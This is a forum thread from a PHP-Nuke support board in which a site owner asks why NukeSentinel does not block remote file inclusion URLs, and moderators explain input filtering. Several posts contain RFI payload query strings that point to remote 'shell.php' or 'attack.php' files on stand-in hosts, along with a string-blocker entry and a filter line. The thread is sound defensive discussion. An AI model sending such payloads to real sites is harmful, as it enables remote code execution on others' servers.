Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x
Author Message
louis_domino
Hangin' Around


Joined: Dec 26, 2006
Posts: 28

PostPosted: Tue Dec 26, 2006 7:42 pm Reply with quote

Hello im just got done updating my Nuke Sentinel to NukeSentinel(tm) 2.5.03

And i know enough about all these SQL Injection and Remote File Inclusions and ive been testing exploits on my site to see how secure it was and it never blocked me when i used ?page=http://www.google.com

Why wouldnt it be blocking that? Thats a major problem lol
 
View user's profile Send private message
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Tue Dec 26, 2006 8:54 pm Reply with quote

And what would the rest of the URL be???? Ok, I'll "bite", what makes you think this query string is a problem?

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
louis_domino
PostPosted: Tue Dec 26, 2006 8:56 pm Reply with quote

For it when i add ?page=http://www.SITE.com/shell.php to loads my site up noramlly and its still in the url

And ?page=http://www.SITE.com/shell.php is a RFI ( Remote File Inclusion ) To upload a shell on the sites server remotly...
 
montego
PostPosted: Wed Dec 27, 2006 7:18 am Reply with quote

But, here is the point: if $page is not used anywhere or, it is being properly "cleansed" before use, then adding that to your query string is of no risk.

If there is a specific hole that you see where the $page is actually being used in a manner where this style of XSS attack would actually succeed, please PM me the details so that we can review.

I cannot speak for the author of NukeSentinel, but I have to believe that if $page had been a problem, he would have added it to the XSS blocker.
 
louis_domino
PostPosted: Wed Dec 27, 2006 10:19 am Reply with quote

oh okay, and ive talked to some others about this and they said its patched now lol, but i think i might add it to Nuke Sentinel's String Blocker though just incase there is a way to use that still...
 
louis_domino
PostPosted: Wed Dec 27, 2006 10:29 am Reply with quote

Yup it worked now, i added it as a String to block in Nuke Sentinel and it banned me..

You have been blocked from entering this site.

You have attempted to bypass the Filter System on this site.

All of the following information has been gathered to assist the webmaster should this need to be reported to local or federal law enforcement.
 
montego
PostPosted: Wed Dec 27, 2006 2:32 pm Reply with quote

Just always remember that NukeSentinel shouldn't even be needed if PHP-Nuke handled the cleansing of input variables properly. But, then again, to be quite honest, that is the case with ALL software. Since software is written by humans, and "to err is human", ...

We ALL make mistakes, so even if YOU personally review a third party block or module's code, things will be missed. The best projects are those that are still active and actively plugging holes as they are found. However, even though PHP-Nuke apparently is still active, the author doesn't care enough to plug the holes... so others are left with having to do it.
 
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Wed Dec 27, 2006 5:48 pm Reply with quote

louis_domino wrote:
Hello im just got done updating my Nuke Sentinel to NukeSentinel(tm) 2.5.03

And i know enough about all these SQL Injection and Remote File Inclusions and ive been testing exploits on my site to see how secure it was and it never blocked me when i used ?page=http://www.google.com

Why wouldnt it be blocking that? Thats a major problem lol


Were you logged in as admin when you tried that? Try it as a non-user.
 
View user's profile Send private message
louis_domino
PostPosted: Wed Dec 27, 2006 9:10 pm Reply with quote

Well it wont work anymore because i added it to NukeSentinel(tm) 2.5.04 String Blocker, the string i added to block is ?page=
 
Gremmie
PostPosted: Wed Dec 27, 2006 10:05 pm Reply with quote

Well you are going to block any module that uses ?page as a variable then...

Sentinel should already be preventing against any XSS attacks. Remove your string block and try it again as a regular or anonymous user.
 
montego
PostPosted: Thu Dec 28, 2006 8:22 am Reply with quote

Good point Gremmie as this line should have caught it:

OR stristr($nsnst_const['query_string'], "http://")

It might be better to delete your cookies to be certain and then re-test without the string blocker.
 
louis_domino
PostPosted: Thu Dec 28, 2006 11:28 am Reply with quote

Okay, i tried it again when i logged out of Admin and User and i typed in this after my url ?page=http://www.evilscripts.com/shell.php and i gave me a Error Page saying

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the administrator, of (none), and inform them of the time the error occurred, and anything you might have done that may have caused the error.

Error: HTTPd: malformed header from script /
 
Gremmie
PostPosted: Thu Dec 28, 2006 12:59 pm Reply with quote

Just to clarify, there isn't anything magical about the variable "page". An attacker who knows the source of a given module may discover that the module author is using some variable "foo" to include a file without first initializing it. He may then formulate a XSS attack by passing a string of the form
Code:
 

http://something.com/blah.php?arg1=1&arg2=2&arg3=3&foo=http://something-evil.com/attack.php


A string blocker for "?page" is only going to protect you if you had some code/module that used the variable "page" in an unprotected manner. Its better to patch the module. And you aren't protecting against other variables getting XSS attacks.

Anyway, back to your error, I just tried to do something similar on my site, and I got a Forbidden error. Maybe its because the // in Only registered users can see links on this board! Get registered or login! needs to be HTML escaped first? I'm just guessing about that.
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©